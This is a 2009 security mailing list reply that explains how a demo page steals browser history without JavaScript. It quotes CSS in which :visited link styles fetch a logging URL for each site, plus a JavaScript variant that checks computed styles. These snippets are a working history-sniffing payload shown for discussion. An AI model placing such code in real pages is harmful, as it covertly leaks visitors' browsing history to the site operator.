funsec mailing list archives
Re: Interesting: Stealing your browser history... without JavaScript!
From: Martin Tomasek <tomasek () ufe cz>
Date: Sun, 14 Jun 2009 01:05:49 +0200
Paul Ferguson napsal(a):
this is funny, it loads different background for visited link (by CSS). site sends page with many links, every link has its own style:http://www.making-the-web.com/misc/sites-you-visit/nojs/
<style type="text/css">#l1 a:visited{background:url(log_base.php?id=1&sess=834299);}#l2 a:visited{background:url(log_base.php?id=2&sess=834299);}#l3 a:visited{background:url(log_base.php?id=3&sess=834299);}#l4 a:visited{background:url(log_base.php?id=4&sess=834299);}#l5 a:visited{background:url(log_base.php?id=5&sess=834299);}#l6 a:visited{background:url(log_base.php?id=6&sess=834299);}#l7 a:visited{background:url(log_base.php?id=7&sess=834299);}#l8 a:visited{background:url(log_base.php?id=8&sess=834299);}#l9 a:visited{background:url(log_base.php?id=9&sess=834299);}#l10 a:visited{background:url(log_base.php?id=10&sess=834299);}#l11 a:visited{background:url(log_base.php?id=11&sess=834299);}#l12
...</style></head><body><span id="l1"><a href="http://google.com/";>a</a><a href="http://www.google.com/";>a</a></span><span id="l2"><a href="http://yahoo.com/";>a</a><a href="http://www.yahoo.com/";>a</a></span><span id="l3"><a href="http://youtube.com/";>a</a><a href="http://www.youtube.com/";>a</a></span><span id="l4"><a href="http://facebook.com/";>a</a><a href="http://www.facebook.com/";>a</a></span>
...javascript version is similar, it generates html code and reads style from link:
...
var l = document.getElementById("checklink");
// if has font size 60px (associated with a:visited)
if(typeof(l.style)!= "undefined" && ((typeof(l.currentStyle) != "undefined" && l.currentStyle.fontSize == "60px") || (typeof(document.defaultView)
!= "undefined" && (document.defaultView.getComputedStyle(l,null)).fontSize == "60px")))
// has visited
return true;
...
--
Martin Tomasek
_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- Interesting: Stealing your browser history... without JavaScript! Paul Ferguson (Jun 13)
- Re: Interesting: Stealing your browser history... without JavaScript! Martin Tomasek (Jun 13)
- Re: Interesting: Stealing your browser history... without JavaScript! Gary Warner (Jun 14)